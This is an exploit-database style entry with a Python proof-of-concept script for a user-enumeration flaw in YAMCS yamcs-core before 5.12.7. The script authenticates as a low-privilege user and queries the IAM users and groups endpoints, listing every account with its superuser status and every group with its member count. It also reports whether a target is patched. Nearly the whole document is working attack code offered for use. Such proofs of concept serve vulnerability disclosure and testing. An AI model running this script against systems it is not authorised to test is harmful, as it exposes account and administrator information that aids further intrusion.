# Exploit Title: YAMCS yamcs-core < 5.12.7 -  User Enumeration 
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44595
# Category: Remote / Information Disclosure
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29

#!/usr/bin/env python3
"""
CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API
=================================================================
IAM API endpoints (listUsers, getUser, listGroups, getGroup) do
not enforce SystemPrivilege.ControlAccess. Any authenticated user
can enumerate all accounts, superuser status, and group memberships.

Affected endpoints:
    GET /api/iam/users
    GET /api/iam/users/{name}
    GET /api/iam/groups
    GET /api/iam/groups/{name}
=================================================================
"""

import requests
import sys
import json

def main():
    target   = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
    username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
    password = sys.argv[3] if len(sys.argv) > 3 else "test"
    base = target.rstrip("/")

    print("=" * 65)
    print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC")
    print(f" Target:   {target}")
    print(f" Username: {username} (low-privilege account)")
    print("=" * 65)

    # Authenticate
    print(f"\n[1] Authenticating as low-privilege user...")
    try:
        resp = requests.post(f"{base}/auth/token",
            data={"grant_type": "password",
                  "username": username,
                  "password": password})

        if resp.status_code != 200:
            print(f"    [-] Auth failed: HTTP {resp.status_code}")
            print(f"    [*] Create test user: yamcsadmin users create testuser --password test")
            return

        token = resp.json().get("access_token")
        print(f"    [+] Token: {token[:30]}...")
        headers = {"Authorization": f"Bearer {token}"}

    except Exception as e:
        print(f"    [-] Error: {e}")
        return

    # Enumerate users
    print(f"\n[2] GET /api/iam/users (requires ControlAccess — not enforced):")
    resp = requests.get(f"{base}/api/iam/users", headers=headers)
    print(f"    HTTP: {resp.status_code}")

    if resp.status_code == 200:
        users = resp.json().get("users", [])
        print(f"\n    [!!!] VULNERABLE — {len(users)} users enumerated:")
        for u in users:
            flag = "SUPERUSER" if u.get("superuser") else "regular"
            print(f"    -> {u.get('name')} [{flag}]")
    elif resp.status_code == 403:
        print(f"    [+] 403 Access Denied — PATCHED")

    # Enumerate groups
    print(f"\n[3] GET /api/iam/groups:")
    resp = requests.get(f"{base}/api/iam/groups", headers=headers)
    print(f"    HTTP: {resp.status_code}")

    if resp.status_code == 200:
        groups = resp.json().get("groups", [])
        print(f"\n    [!!!] VULNERABLE — {len(groups)} groups enumerated:")
        for g in groups:
            print(f"    -> {g.get('name')} ({len(g.get('members', []))} members)")
    elif resp.status_code == 403:
        print(f"    [+] 403 Access Denied — PATCHED")

    print("\n" + "=" * 65)
    print(" Fix: Upgrade to yamcs-core >= 5.12.7")
    print("=" * 65)

if __name__ == "__main__":
    main()